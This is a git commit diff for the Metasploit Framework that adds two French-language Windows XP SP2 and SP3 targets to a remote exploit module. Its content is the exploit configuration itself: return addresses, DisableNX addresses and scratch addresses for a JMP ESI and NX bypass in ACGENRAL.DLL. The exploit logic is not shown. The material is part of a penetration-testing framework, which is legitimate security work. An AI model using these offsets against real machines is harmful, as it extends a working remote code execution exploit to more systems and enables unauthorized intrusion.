New french targets from Antoine
git-svn-id: file:///home/svn/framework3/trunk@5818 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
c5ad82fb68
commit
de6c726e0a
|
@ -104,6 +104,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
#
|
||||
[ 'Windows XP SP2 French (NX)',
|
||||
{
|
||||
'Ret' => 0x595bf727,
|
||||
'DisableNX' => 0x595c16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Giorgio Casali <giorgio.casali[at]gmail.com>
|
||||
|
@ -151,6 +162,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
#
|
||||
[ 'Windows XP SP3 French (NX)',
|
||||
{
|
||||
'Ret' => 0x595bf807,
|
||||
'DisableNX' => 0x595c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
#
|
||||
|
|
Loading…
Reference in New Issue